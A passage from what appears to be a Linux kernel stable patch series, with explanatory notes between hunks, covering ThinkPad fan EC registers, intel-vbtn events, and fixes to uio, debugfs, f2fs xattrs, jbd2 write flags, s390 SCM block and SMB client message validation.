+ 	autorelease = val && (!ke_rel || ke_rel->type == KE_IGNORE);
+ 
+ 	sparse_keymap_report_event(input_dev, event, val, autorelease);
++
++	/* Some devices need this to report further events */
++	acpi_evaluate_object(handle, "VBDL", NULL, NULL);
+ }
+ 
+ /*
+@@ -358,7 +363,13 @@ static void intel_vbtn_pm_complete(struct device *dev)
+ 
+ static int intel_vbtn_pm_resume(struct device *dev)
+ {
++	struct intel_vbtn_priv *priv = dev_get_drvdata(dev);
++
+ 	intel_vbtn_pm_complete(dev);
++
++	if (priv->has_switches)
++		detect_tablet_mode(dev);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 05a55bc31c796..6edd2e294750e 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -8149,8 +8149,19 @@ static struct ibm_struct volume_driver_data = {
+  * 	TPACPI_FAN_WR_TPEC is also available and should be used to
+  * 	command the fan.  The X31/X40/X41 seems to have 8 fan levels,
+  * 	but the ACPI tables just mention level 7.
++ *
++ * TPACPI_FAN_RD_TPEC_NS:
++ *	This mode is used for a few ThinkPads (L13 Yoga Gen2, X13 Yoga Gen2 etc.)
++ *	that are using non-standard EC locations for reporting fan speeds.
++ *	Currently these platforms only provide fan rpm reporting.
++ *
+  */
+ 
++#define FAN_RPM_CAL_CONST 491520	/* FAN RPM calculation offset for some non-standard ECFW */
++
++#define FAN_NS_CTRL_STATUS	BIT(2)		/* Bit which determines control is enabled or not */
++#define FAN_NS_CTRL		BIT(4)		/* Bit which determines control is by host or EC */
++
+ enum {					/* Fan control constants */
+ 	fan_status_offset = 0x2f,	/* EC register 0x2f */
+ 	fan_rpm_offset = 0x84,		/* EC register 0x84: LSB, 0x85 MSB (RPM)
+@@ -8158,6 +8169,11 @@ enum {					/* Fan control constants */
+ 	fan_select_offset = 0x31,	/* EC register 0x31 (Firmware 7M)
+ 					   bit 0 selects which fan is active */
+ 
++	fan_status_offset_ns = 0x93,	/* Special status/control offset for non-standard EC Fan1 */
++	fan2_status_offset_ns = 0x96,	/* Special status/control offset for non-standard EC Fan2 */
++	fan_rpm_status_ns = 0x95,	/* Special offset for Fan1 RPM status for non-standard EC */
++	fan2_rpm_status_ns = 0x98,	/* Special offset for Fan2 RPM status for non-standard EC */
++
+ 	TP_EC_FAN_FULLSPEED = 0x40,	/* EC fan mode: full speed */
+ 	TP_EC_FAN_AUTO	    = 0x80,	/* EC fan mode: auto fan control */
+ 
+@@ -8168,6 +8184,7 @@ enum fan_status_access_mode {
+ 	TPACPI_FAN_NONE = 0,		/* No fan status or control */
+ 	TPACPI_FAN_RD_ACPI_GFAN,	/* Use ACPI GFAN */
+ 	TPACPI_FAN_RD_TPEC,		/* Use ACPI EC regs 0x2f, 0x84-0x85 */
++	TPACPI_FAN_RD_TPEC_NS,		/* Use non-standard ACPI EC regs (eg: L13 Yoga gen2 etc.) */
+ };
+ 
+ enum fan_control_access_mode {
+@@ -8195,6 +8212,8 @@ static u8 fan_control_desired_level;
+ static u8 fan_control_resume_level;
+ static int fan_watchdog_maxinterval;
+ 
++static bool fan_with_ns_addr;
++
+ static struct mutex fan_mutex;
+ 
+ static void fan_watchdog_fire(struct work_struct *ignored);
+@@ -8325,6 +8344,15 @@ static int fan_get_status(u8 *status)
+ 		}
+ 
+ 		break;
++	case TPACPI_FAN_RD_TPEC_NS:
++		/* Default mode is AUTO which means controlled by EC */
++		if (!acpi_ec_read(fan_status_offset_ns, &s))
++			return -EIO;
++
++		if (status)
++			*status = s;
++
++		break;
+ 
+ 	default:
+ 		return -ENXIO;
+@@ -8341,7 +8369,8 @@ static int fan_get_status_safe(u8 *status)
+ 	if (mutex_lock_killable(&fan_mutex))
+ 		return -ERESTARTSYS;
+ 	rc = fan_get_status(&s);
+-	if (!rc)
++	/* NS EC doesn't have register with level settings */
++	if (!rc && !fan_with_ns_addr)
+ 		fan_update_desired_level(s);
+ 	mutex_unlock(&fan_mutex);
+ 
+@@ -8368,7 +8397,13 @@ static int fan_get_speed(unsigned int *speed)
+ 
+ 		if (likely(speed))
+ 			*speed = (hi << 8) | lo;
++		break;
++	case TPACPI_FAN_RD_TPEC_NS:
++		if (!acpi_ec_read(fan_rpm_status_ns, &lo))
++			return -EIO;
+ 
++		if (speed)
++			*speed = lo ? FAN_RPM_CAL_CONST / lo : 0;
+ 		break;
+ 
+ 	default:
+@@ -8380,7 +8415,7 @@ static int fan_get_speed(unsigned int *speed)
+ 
+ static int fan2_get_speed(unsigned int *speed)
+ {
+-	u8 hi, lo;
++	u8 hi, lo, status;
+ 	bool rc;
+ 
+ 	switch (fan_status_access_mode) {
+@@ -8396,7 +8431,21 @@ static int fan2_get_speed(unsigned int *speed)
+ 
+ 		if (likely(speed))
+ 			*speed = (hi << 8) | lo;
++		break;
+ 
++	case TPACPI_FAN_RD_TPEC_NS:
++		rc = !acpi_ec_read(fan2_status_offset_ns, &status);
++		if (rc)
++			return -EIO;
++		if (!(status & FAN_NS_CTRL_STATUS)) {
++			pr_info("secondary fan control not supported\n");
++			return -EIO;
++		}
++		rc = !acpi_ec_read(fan2_rpm_status_ns, &lo);
++		if (rc)
++			return -EIO;
++		if (speed)
++			*speed = lo ? FAN_RPM_CAL_CONST / lo : 0;
+ 		break;
+ 
+ 	default:
+@@ -8899,6 +8948,7 @@ static const struct attribute_group fan_driver_attr_group = {
+ #define TPACPI_FAN_2FAN		0x0002		/* EC 0x31 bit 0 selects fan2 */
+ #define TPACPI_FAN_2CTL		0x0004		/* selects fan2 control */
+ #define TPACPI_FAN_NOFAN	0x0008		/* no fan available */
++#define TPACPI_FAN_NS		0x0010		/* For EC with non-Standard register addresses */
+ 
+ static const struct tpacpi_quirk fan_quirk_table[] __initconst = {
+ 	TPACPI_QEC_IBM('1', 'Y', TPACPI_FAN_Q1),
+@@ -8917,6 +8967,8 @@ static const struct tpacpi_quirk fan_quirk_table[] __initconst = {
+ 	TPACPI_Q_LNV3('N', '2', 'O', TPACPI_FAN_2CTL),	/* P1 / X1 Extreme (2nd gen) */
+ 	TPACPI_Q_LNV3('N', '3', '0', TPACPI_FAN_2CTL),	/* P15 (1st gen) / P15v (1st gen) */
+ 	TPACPI_Q_LNV3('N', '3', '7', TPACPI_FAN_2CTL),  /* T15g (2nd gen) */
++	TPACPI_Q_LNV3('R', '1', 'F', TPACPI_FAN_NS),	/* L13 Yoga Gen 2 */
++	TPACPI_Q_LNV3('N', '2', 'U', TPACPI_FAN_NS),	/* X13 Yoga Gen 2*/
+ 	TPACPI_Q_LNV3('N', '1', 'O', TPACPI_FAN_NOFAN),	/* X1 Tablet (2nd gen) */
+ };
+ 
+@@ -8951,18 +9003,27 @@ static int __init fan_init(struct ibm_init_struct *iibm)
+ 		return -ENODEV;
+ 	}
+ 
++	if (quirks & TPACPI_FAN_NS) {
++		pr_info("ECFW with non-standard fan reg control found\n");
++		fan_with_ns_addr = 1;
++		/* Fan ctrl support from host is undefined for now */
++		tp_features.fan_ctrl_status_undef = 1;
++	}
++
+ 	if (gfan_handle) {
+ 		/* 570, 600e/x, 770e, 770x */
+ 		fan_status_access_mode = TPACPI_FAN_RD_ACPI_GFAN;
+ 	} else {
+ 		/* all other ThinkPads: note that even old-style
+ 		 * ThinkPad ECs supports the fan control register */
+-		if (likely(acpi_ec_read(fan_status_offset,
+-					&fan_control_initial_status))) {
++		if (fan_with_ns_addr ||
++		    likely(acpi_ec_read(fan_status_offset, &fan_control_initial_status))) {
+ 			int res;
+ 			unsigned int speed;
+ 
+-			fan_status_access_mode = TPACPI_FAN_RD_TPEC;
++			fan_status_access_mode = fan_with_ns_addr ?
++				TPACPI_FAN_RD_TPEC_NS : TPACPI_FAN_RD_TPEC;
++
+ 			if (quirks & TPACPI_FAN_Q1)
+ 				fan_quirk1_setup();
+ 			/* Try and probe the 2nd fan */
+@@ -8971,7 +9032,8 @@ static int __init fan_init(struct ibm_init_struct *iibm)
+ 			if (res >= 0 && speed != FAN_NOT_PRESENT) {
+ 				/* It responded - so let's assume it's there */
+ 				tp_features.second_fan = 1;
+-				tp_features.second_fan_ctl = 1;
++				/* fan control not currently available for ns ECFW */
++				tp_features.second_fan_ctl = !fan_with_ns_addr;
+ 				pr_info("secondary fan control detected & enabled\n");
+ 			} else {
+ 				/* Fan not auto-detected */
+@@ -9146,6 +9208,7 @@ static int fan_read(struct seq_file *m)
+ 			       str_enabled_disabled(status), status);
+ 		break;
+ 
++	case TPACPI_FAN_RD_TPEC_NS:
+ 	case TPACPI_FAN_RD_TPEC:
+ 		/* all except 570, 600e/x, 770e, 770x */
+ 		rc = fan_get_status_safe(&status);
+@@ -9160,13 +9223,22 @@ static int fan_read(struct seq_file *m)
+ 
+ 		seq_printf(m, "speed:\t\t%d\n", speed);
+ 
+-		if (status & TP_EC_FAN_FULLSPEED)
+-			/* Disengaged mode takes precedence */
+-			seq_printf(m, "level:\t\tdisengaged\n");
+-		else if (status & TP_EC_FAN_AUTO)
+-			seq_printf(m, "level:\t\tauto\n");
+-		else
+-			seq_printf(m, "level:\t\t%d\n", status);
++		if (fan_status_access_mode == TPACPI_FAN_RD_TPEC_NS) {
++			/*
++			 * The NS EC has no full-speed bit.
++			 * EC auto mode is set by default;
++			 * no other level settings are available.
++			 */
++			seq_printf(m, "level:\t\t%s\n", status & FAN_NS_CTRL ? "unknown" : "auto");
++		} else {
++			if (status & TP_EC_FAN_FULLSPEED)
++				/* Disengaged mode takes precedence */
++				seq_printf(m, "level:\t\tdisengaged\n");
++			else if (status & TP_EC_FAN_AUTO)
++				seq_printf(m, "level:\t\tauto\n");
++			else
++				seq_printf(m, "level:\t\t%d\n", status);
++		}
+ 		break;
+ 
+ 	case TPACPI_FAN_NONE:
+diff --git a/drivers/reset/hisilicon/hi6220_reset.c b/drivers/reset/hisilicon/hi6220_reset.c
+index 5ca145b64e63d..30951914afac7 100644
+--- a/drivers/reset/hisilicon/hi6220_reset.c
++++ b/drivers/reset/hisilicon/hi6220_reset.c
+@@ -164,7 +164,7 @@ static int hi6220_reset_probe(struct platform_device *pdev)
+ 	if (!data)
+ 		return -ENOMEM;
+ 
+-	type = (enum hi6220_reset_ctrl_type)of_device_get_match_data(dev);
++	type = (uintptr_t)of_device_get_match_data(dev);
+ 
+ 	regmap = syscon_node_to_regmap(np);
+ 	if (IS_ERR(regmap)) {
+diff --git a/drivers/s390/block/scm_blk.c b/drivers/s390/block/scm_blk.c
+index 0c1df1d5f1aca..a165b1a59fde5 100644
+--- a/drivers/s390/block/scm_blk.c
++++ b/drivers/s390/block/scm_blk.c
+@@ -17,6 +17,7 @@
+ #include <linux/blk-mq.h>
+ #include <linux/slab.h>
+ #include <linux/list.h>
++#include <linux/io.h>
+ #include <asm/eadm.h>
+ #include "scm_blk.h"
+ 
+@@ -130,7 +131,7 @@ static void scm_request_done(struct scm_request *scmrq)
+ 
+ 	for (i = 0; i < nr_requests_per_io && scmrq->request[i]; i++) {
+ 		msb = &scmrq->aob->msb[i];
+-		aidaw = msb->data_addr;
++		aidaw = (u64)phys_to_virt(msb->data_addr);
+ 
+ 		if ((msb->flags & MSB_FLAG_IDA) && aidaw &&
+ 		    IS_ALIGNED(aidaw, PAGE_SIZE))
+@@ -195,12 +196,12 @@ static int scm_request_prepare(struct scm_request *scmrq)
+ 	msb->scm_addr = scmdev->address + ((u64) blk_rq_pos(req) << 9);
+ 	msb->oc = (rq_data_dir(req) == READ) ? MSB_OC_READ : MSB_OC_WRITE;
+ 	msb->flags |= MSB_FLAG_IDA;
+-	msb->data_addr = (u64) aidaw;
++	msb->data_addr = (u64)virt_to_phys(aidaw);
+ 
+ 	rq_for_each_segment(bv, req, iter) {
+ 		WARN_ON(bv.bv_offset);
+ 		msb->blk_count += bv.bv_len >> 12;
+-		aidaw->data_addr = (u64) page_address(bv.bv_page);
++		aidaw->data_addr = virt_to_phys(page_address(bv.bv_page));
+ 		aidaw++;
+ 	}
+ 
+diff --git a/drivers/uio/uio.c b/drivers/uio/uio.c
+index 43afbb7c5ab91..e55e8cef8defc 100644
+--- a/drivers/uio/uio.c
++++ b/drivers/uio/uio.c
+@@ -466,13 +466,13 @@ static int uio_open(struct inode *inode, struct file *filep)
+ 
+ 	mutex_lock(&minor_lock);
+ 	idev = idr_find(&uio_idr, iminor(inode));
+-	mutex_unlock(&minor_lock);
+ 	if (!idev) {
+ 		ret = -ENODEV;
++		mutex_unlock(&minor_lock);
+ 		goto out;
+ 	}
+-
+ 	get_device(&idev->dev);
++	mutex_unlock(&minor_lock);
+ 
+ 	if (!try_module_get(idev->owner)) {
+ 		ret = -ENODEV;
+@@ -1064,9 +1064,8 @@ void uio_unregister_device(struct uio_info *info)
+ 	wake_up_interruptible(&idev->wait);
+ 	kill_fasync(&idev->async_queue, SIGIO, POLL_HUP);
+ 
+-	device_unregister(&idev->dev);
+-
+ 	uio_free_minor(minor);
++	device_unregister(&idev->dev);
+ 
+ 	return;
+ }
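
Both uio hunks above are ordering fixes around object lifetime: uio_open() must take its reference on the device while minor_lock is still held, otherwise a concurrent uio_unregister_device() can free the idev between idr_find() and get_device(); and unregister now releases the minor before device_unregister() so a racing open cannot look up a device whose teardown has already begun. A minimal sketch of the safe lookup pattern, with hypothetical my_dev/my_dev_get names:

	#include <linux/device.h>
	#include <linux/idr.h>
	#include <linux/mutex.h>

	struct my_dev {			/* hypothetical stand-in for uio_device */
		struct device dev;
	};

	/* Take the reference while the lookup lock is still held, so a
	 * concurrent unregister cannot free the object in the window
	 * between the lookup and the get. */
	static struct my_dev *my_dev_get(struct idr *idr, int minor,
					 struct mutex *lock)
	{
		struct my_dev *d;

		mutex_lock(lock);
		d = idr_find(idr, minor);
		if (d)
			get_device(&d->dev);
		mutex_unlock(lock);
		return d;		/* NULL if no such minor is registered */
	}
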
+diff --git a/fs/debugfs/file.c b/fs/debugfs/file.c
+index b54f470e0d031..b38304b444764 100644
+--- a/fs/debugfs/file.c
++++ b/fs/debugfs/file.c
+@@ -84,6 +84,14 @@ int debugfs_file_get(struct dentry *dentry)
+ 	struct debugfs_fsdata *fsd;
+ 	void *d_fsd;
+ 
++	/*
++	 * This could only happen if some debugfs user erroneously calls
++	 * debugfs_file_get() on a dentry that isn't even a file; let
++	 * them know about it.
++	 */
++	if (WARN_ON(!d_is_reg(dentry)))
++		return -EINVAL;
++
+ 	d_fsd = READ_ONCE(dentry->d_fsdata);
+ 	if (!((unsigned long)d_fsd & DEBUGFS_FSDATA_IS_REAL_FOPS_BIT)) {
+ 		fsd = d_fsd;
+diff --git a/fs/debugfs/inode.c b/fs/debugfs/inode.c
+index 2e8e112b19930..08ef685167ec5 100644
+--- a/fs/debugfs/inode.c
++++ b/fs/debugfs/inode.c
+@@ -237,17 +237,19 @@ static const struct super_operations debugfs_super_operations = {
+ 
+ static void debugfs_release_dentry(struct dentry *dentry)
+ {
+-	void *fsd = dentry->d_fsdata;
++	struct debugfs_fsdata *fsd = dentry->d_fsdata;
+ 
+-	if (!((unsigned long)fsd & DEBUGFS_FSDATA_IS_REAL_FOPS_BIT))
+-		kfree(dentry->d_fsdata);
++	if ((unsigned long)fsd & DEBUGFS_FSDATA_IS_REAL_FOPS_BIT)
++		return;
++
++	kfree(fsd);
+ }
+ 
+ static struct vfsmount *debugfs_automount(struct path *path)
+ {
+-	debugfs_automount_t f;
+-	f = (debugfs_automount_t)path->dentry->d_fsdata;
+-	return f(path->dentry, d_inode(path->dentry)->i_private);
++	struct debugfs_fsdata *fsd = path->dentry->d_fsdata;
++
++	return fsd->automount(path->dentry, d_inode(path->dentry)->i_private);
+ }
+ 
+ static const struct dentry_operations debugfs_dops = {
+@@ -635,13 +637,23 @@ struct dentry *debugfs_create_automount(const char *name,
+ 					void *data)
+ {
+ 	struct dentry *dentry = start_creating(name, parent);
++	struct debugfs_fsdata *fsd;
+ 	struct inode *inode;
+ 
+ 	if (IS_ERR(dentry))
+ 		return dentry;
+ 
++	fsd = kzalloc(sizeof(*fsd), GFP_KERNEL);
++	if (!fsd) {
++		failed_creating(dentry);
++		return ERR_PTR(-ENOMEM);
++	}
++
++	fsd->automount = f;
++
+ 	if (!(debugfs_allow & DEBUGFS_ALLOW_API)) {
+ 		failed_creating(dentry);
++		kfree(fsd);
+ 		return ERR_PTR(-EPERM);
+ 	}
+ 
+@@ -649,13 +661,14 @@ struct dentry *debugfs_create_automount(const char *name,
+ 	if (unlikely(!inode)) {
+ 		pr_err("out of free dentries, can not create automount '%s'\n",
+ 		       name);
++		kfree(fsd);
+ 		return failed_creating(dentry);
+ 	}
+ 
+ 	make_empty_dir_inode(inode);
+ 	inode->i_flags |= S_AUTOMOUNT;
+ 	inode->i_private = data;
+-	dentry->d_fsdata = (void *)f;
++	dentry->d_fsdata = fsd;
+ 	/* directory inodes start off with i_nlink == 2 (for "." entry) */
+ 	inc_nlink(inode);
+ 	d_instantiate(dentry, inode);
+diff --git a/fs/debugfs/internal.h b/fs/debugfs/internal.h
+index 92af8ae313134..f7c489b5a368c 100644
+--- a/fs/debugfs/internal.h
++++ b/fs/debugfs/internal.h
+@@ -17,8 +17,14 @@ extern const struct file_operations debugfs_full_proxy_file_operations;
+ 
+ struct debugfs_fsdata {
+ 	const struct file_operations *real_fops;
+-	refcount_t active_users;
+-	struct completion active_users_drained;
++	union {
++		/* automount_fn is used when real_fops is NULL */
++		debugfs_automount_t automount;
++		struct {
++			refcount_t active_users;
++			struct completion active_users_drained;
++		};
++	};
+ };
+ 
+ /*
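
The debugfs changes above all revolve around one encoding trick: dentry->d_fsdata holds either a kmalloc()ed struct debugfs_fsdata or a real file_operations pointer tagged by setting bit 0 (DEBUGFS_FSDATA_IS_REAL_FOPS_BIT), which is safe because such pointers are more than byte-aligned. Automount dentries previously stashed a bare, untagged function pointer there, which debugfs_release_dentry() could then misinterpret; routing the callback through the new union member keeps the encoding uniform. A small, runnable sketch of the tagging scheme (hypothetical helper names):

	#include <stdint.h>

	#define IS_REAL_FOPS_BIT 1UL	/* mirrors DEBUGFS_FSDATA_IS_REAL_FOPS_BIT */

	/* Allocator-returned pointers are at least word aligned, so bit 0
	 * is free to distinguish "tagged raw pointer" from "allocated
	 * struct". */
	static inline void *tag_ptr(const void *p)
	{
		return (void *)((uintptr_t)p | IS_REAL_FOPS_BIT);
	}

	static inline int ptr_is_tagged(const void *p)
	{
		return (uintptr_t)p & IS_REAL_FOPS_BIT;
	}

	static inline void *untag_ptr(const void *p)
	{
		return (void *)((uintptr_t)p & ~IS_REAL_FOPS_BIT);
	}
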
+diff --git a/fs/f2fs/xattr.c b/fs/f2fs/xattr.c
+index adaad16468d8a..8816e13ca7c9e 100644
+--- a/fs/f2fs/xattr.c
++++ b/fs/f2fs/xattr.c
+@@ -754,6 +754,12 @@ retry:
+ 		memcpy(pval, value, size);
+ 		last->e_value_size = cpu_to_le16(size);
+ 		new_hsize += newsize;
++		/*
++		 * Explicitly add the null terminator.  The unused xattr space
++		 * is supposed to always be zeroed, which would make this
++		 * unnecessary, but don't depend on that.
++		 */
++		*(u32 *)((u8 *)last + newsize) = 0;
+ 	}
+ 
+ 	error = write_all_xattrs(inode, new_hsize, base_addr, ipage);
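
The hunk above matters because f2fs walks its xattr area as a packed list terminated by a zeroed entry header; if the bytes after the last entry are stale, the walker can run off the end. Writing the terminator explicitly removes the dependency on the space being pre-zeroed. A toy, runnable illustration of sentinel-terminated packing (simplified layout, not the real f2fs on-disk format):

	#include <stdint.h>
	#include <stdio.h>
	#include <string.h>

	/* Entries are [u32 length][payload...]; a zero length terminates. */
	static void walk(const uint8_t *buf)
	{
		const uint8_t *p = buf;
		uint32_t len;

		for (;;) {
			memcpy(&len, p, sizeof(len));
			if (!len)		/* the explicit terminator */
				break;
			printf("entry of %u bytes\n", len);
			p += sizeof(len) + len;
		}
	}

	int main(void)
	{
		uint8_t buf[32] = { 0 };	/* zeroed, so the walk terminates */
		uint32_t len = 4;

		memcpy(buf, &len, sizeof(len));	/* one 4-byte entry up front */
		walk(buf);
		return 0;
	}
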
+diff --git a/fs/jbd2/commit.c b/fs/jbd2/commit.c
+index f1d9db6686e31..556b259a00ba6 100644
+--- a/fs/jbd2/commit.c
++++ b/fs/jbd2/commit.c
+@@ -123,7 +123,7 @@ static int journal_submit_commit_record(journal_t *journal,
+ 	struct commit_header *tmp;
+ 	struct buffer_head *bh;
+ 	struct timespec64 now;
+-	blk_opf_t write_flags = REQ_OP_WRITE | REQ_SYNC;
++	blk_opf_t write_flags = REQ_OP_WRITE | JBD2_JOURNAL_REQ_FLAGS;
+ 
+ 	*cbh = NULL;
+ 
+@@ -300,6 +300,7 @@ static int journal_finish_inode_data_buffers(journal_t *journal,
+ 			if (!ret)
+ 				ret = err;
+ 		}
++		cond_resched();
+ 		spin_lock(&journal->j_list_lock);
+ 		jinode->i_flags &= ~JI_COMMIT_RUNNING;
+ 		smp_mb();
+@@ -429,8 +430,7 @@ void jbd2_journal_commit_transaction(journal_t *journal)
+ 		 */
+ 		jbd2_journal_update_sb_log_tail(journal,
+ 						journal->j_tail_sequence,
+-						journal->j_tail,
+-						REQ_SYNC);
++						journal->j_tail, 0);
+ 		mutex_unlock(&journal->j_checkpoint_mutex);
+ 	} else {
+ 		jbd2_debug(3, "superblock not updated\n");
+@@ -749,6 +749,7 @@ start_journal_io:
+ 
+ 			for (i = 0; i < bufs; i++) {
+ 				struct buffer_head *bh = wbuf[i];
++
+ 				/*
+ 				 * Compute checksum.
+ 				 */
+@@ -761,7 +762,8 @@ start_journal_io:
+ 				clear_buffer_dirty(bh);
+ 				set_buffer_uptodate(bh);
+ 				bh->b_end_io = journal_end_buffer_io_sync;
+-				submit_bh(REQ_OP_WRITE | REQ_SYNC, bh);
++				submit_bh(REQ_OP_WRITE | JBD2_JOURNAL_REQ_FLAGS,
++					  bh);
+ 			}
+ 			cond_resched();
+ 
+diff --git a/fs/jbd2/journal.c b/fs/jbd2/journal.c
+index 2696f43e7239f..3df45e4699f10 100644
+--- a/fs/jbd2/journal.c
++++ b/fs/jbd2/journal.c
+@@ -1109,8 +1109,7 @@ int __jbd2_update_log_tail(journal_t *journal, tid_t tid, unsigned long block)
+ 	 * space and if we lose sb update during power failure we'd replay
+ 	 * old transaction with possibly newly overwritten data.
+ 	 */
+-	ret = jbd2_journal_update_sb_log_tail(journal, tid, block,
+-					      REQ_SYNC | REQ_FUA);
++	ret = jbd2_journal_update_sb_log_tail(journal, tid, block, REQ_FUA);
+ 	if (ret)
+ 		goto out;
+ 
+@@ -1597,8 +1596,7 @@ static int journal_reset(journal_t *journal)
+ 		 */
+ 		jbd2_journal_update_sb_log_tail(journal,
+ 						journal->j_tail_sequence,
+-						journal->j_tail,
+-						REQ_SYNC | REQ_FUA);
++						journal->j_tail, REQ_FUA);
+ 		mutex_unlock(&journal->j_checkpoint_mutex);
+ 	}
+ 	return jbd2_journal_start_thread(journal);
+@@ -1620,9 +1618,16 @@ static int jbd2_write_superblock(journal_t *journal, blk_opf_t write_flags)
+ 		return -EIO;
+ 	}
+ 
+-	trace_jbd2_write_superblock(journal, write_flags);
++	/*
++	 * Always set high-priority flags so journal I/O is exempt from the
++	 * block layer's QoS policies, e.g. writeback throttling.
++	 */
++	write_flags |= JBD2_JOURNAL_REQ_FLAGS;
+ 	if (!(journal->j_flags & JBD2_BARRIER))
+ 		write_flags &= ~(REQ_FUA | REQ_PREFLUSH);
++
++	trace_jbd2_write_superblock(journal, write_flags);
++
+ 	if (buffer_write_io_error(bh)) {
+ 		/*
+ 		 * Oh, dear.  A previous attempt to write the journal
+@@ -1871,7 +1876,7 @@ void jbd2_journal_update_sb_errno(journal_t *journal)
+ 	jbd2_debug(1, "JBD2: updating superblock error (errno %d)\n", errcode);
+ 	sb->s_errno    = cpu_to_be32(errcode);
+ 
+-	jbd2_write_superblock(journal, REQ_SYNC | REQ_FUA);
++	jbd2_write_superblock(journal, REQ_FUA);
+ }
+ EXPORT_SYMBOL(jbd2_journal_update_sb_errno);
+ 
+@@ -2176,8 +2181,7 @@ int jbd2_journal_destroy(journal_t *journal)
+ 				++journal->j_transaction_sequence;
+ 			write_unlock(&journal->j_state_lock);
+ 
+-			jbd2_mark_journal_empty(journal,
+-					REQ_SYNC | REQ_PREFLUSH | REQ_FUA);
++			jbd2_mark_journal_empty(journal, REQ_PREFLUSH | REQ_FUA);
+ 			mutex_unlock(&journal->j_checkpoint_mutex);
+ 		} else
+ 			err = -EIO;
+@@ -2486,7 +2490,7 @@ int jbd2_journal_flush(journal_t *journal, unsigned int flags)
+ 	 * the magic code for a fully-recovered superblock.  Any future
+ 	 * commits of data to the journal will restore the current
+ 	 * s_start value. */
+-	jbd2_mark_journal_empty(journal, REQ_SYNC | REQ_FUA);
++	jbd2_mark_journal_empty(journal, REQ_FUA);
+ 
+ 	if (flags)
+ 		err = __jbd2_journal_erase(journal, flags);
+@@ -2536,7 +2540,7 @@ int jbd2_journal_wipe(journal_t *journal, int write)
+ 	if (write) {
+ 		/* Lock to make assertions happy... */
+ 		mutex_lock_io(&journal->j_checkpoint_mutex);
+-		jbd2_mark_journal_empty(journal, REQ_SYNC | REQ_FUA);
++		jbd2_mark_journal_empty(journal, REQ_FUA);
+ 		mutex_unlock(&journal->j_checkpoint_mutex);
+ 	}
+ 
+diff --git a/fs/smb/client/cifspdu.h b/fs/smb/client/cifspdu.h
+index c403816d0b6c1..97bb1838555b4 100644
+--- a/fs/smb/client/cifspdu.h
++++ b/fs/smb/client/cifspdu.h
+@@ -882,11 +882,13 @@ typedef struct smb_com_open_rsp {
+ 	__u8 OplockLevel;
+ 	__u16 Fid;
+ 	__le32 CreateAction;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 FileAttributes;
++	struct_group(common_attributes,
++		__le64 CreationTime;
++		__le64 LastAccessTime;
++		__le64 LastWriteTime;
++		__le64 ChangeTime;
++		__le32 FileAttributes;
++	);
+ 	__le64 AllocationSize;
+ 	__le64 EndOfFile;
+ 	__le16 FileType;
+@@ -2268,11 +2270,13 @@ typedef struct {
+ /* QueryFileInfo/QueryPathinfo (also for SetPath/SetFile) data buffer formats */
+ /******************************************************************************/
+ typedef struct { /* data block encoding of response to level 263 QPathInfo */
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 Attributes;
++	struct_group(common_attributes,
++		__le64 CreationTime;
++		__le64 LastAccessTime;
++		__le64 LastWriteTime;
++		__le64 ChangeTime;
++		__le32 Attributes;
++	);
+ 	__u32 Pad1;
+ 	__le64 AllocationSize;
+ 	__le64 EndOfFile;	/* size ie offset to first free byte in file */
+diff --git a/fs/smb/client/cifssmb.c b/fs/smb/client/cifssmb.c
+index c90d4ec9292ca..67c5fc2b2db94 100644
+--- a/fs/smb/client/cifssmb.c
++++ b/fs/smb/client/cifssmb.c
+@@ -1234,8 +1234,10 @@ openRetry:
+ 		*oplock |= CIFS_CREATE_ACTION;
+ 
+ 	if (buf) {
+-		/* copy from CreationTime to Attributes */
+-		memcpy((char *)buf, (char *)&rsp->CreationTime, 36);
++		/* copy commonly used attributes */
++		memcpy(&buf->common_attributes,
++		       &rsp->common_attributes,
++		       sizeof(buf->common_attributes));
+ 		/* the file_info buf is endian converted by caller */
+ 		buf->AllocationSize = rsp->AllocationSize;
+ 		buf->EndOfFile = rsp->EndOfFile;
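
struct_group() (from <linux/stddef.h>) wraps a run of members in a union of an anonymous struct and an identically laid-out named struct, so existing rsp->CreationTime accesses keep working while sizeof(rsp->common_attributes) gives the exact span of the group. That turns the old hand-counted memcpy of 36 bytes into something the compiler and FORTIFY_SOURCE can bounds-check. Conceptually, with a reduced two-member expansion (not the full macro output):

	#include <linux/types.h>
	#include <linux/string.h>

	struct rsp {
		union {
			struct {	/* anonymous: r.CreationTime still works */
				__le64 CreationTime;
				__le64 LastAccessTime;
			};
			struct {	/* named: sizeof(r.ts) spans the group */
				__le64 CreationTime;
				__le64 LastAccessTime;
			} ts;
		};
	};

	static void copy_times(struct rsp *dst, const struct rsp *src)
	{
		memcpy(&dst->ts, &src->ts, sizeof(dst->ts));	/* bounds-checkable */
	}
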
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+index fdf7a7f188c5f..15fa022e79993 100644
+--- a/fs/smb/client/smb2misc.c
++++ b/fs/smb/client/smb2misc.c
+@@ -173,6 +173,21 @@ smb2_check_message(char *buf, unsigned int len, struct TCP_Server_Info *server)
+ 	}
+ 
+ 	mid = le64_to_cpu(shdr->MessageId);
++	if (check_smb2_hdr(shdr, mid))
++		return 1;
++
++	if (shdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
++		cifs_dbg(VFS, "Invalid structure size %u\n",
++			 le16_to_cpu(shdr->StructureSize));
++		return 1;
++	}
++
++	command = le16_to_cpu(shdr->Command);
++	if (command >= NUMBER_OF_SMB2_COMMANDS) {
++		cifs_dbg(VFS, "Invalid SMB2 command %d\n", command);
++		return 1;
++	}
++
+ 	if (len < pdu_size) {
+ 		if ((len >= hdr_size)
+ 		    && (shdr->Status != 0)) {
+@@ -193,21 +208,6 @@ smb2_check_message(char *buf, unsigned int len, struct TCP_Server_Info *server)
+ 		return 1;
+ 	}
+ 
+-	if (check_smb2_hdr(shdr, mid))
+-		return 1;
+-
+-	if (shdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
+-		cifs_dbg(VFS, "Invalid structure size %u\n",
+-			 le16_to_cpu(shdr->StructureSize));
+-		return 1;
+-	}
+-
+-	command = le16_to_cpu(shdr->Command);
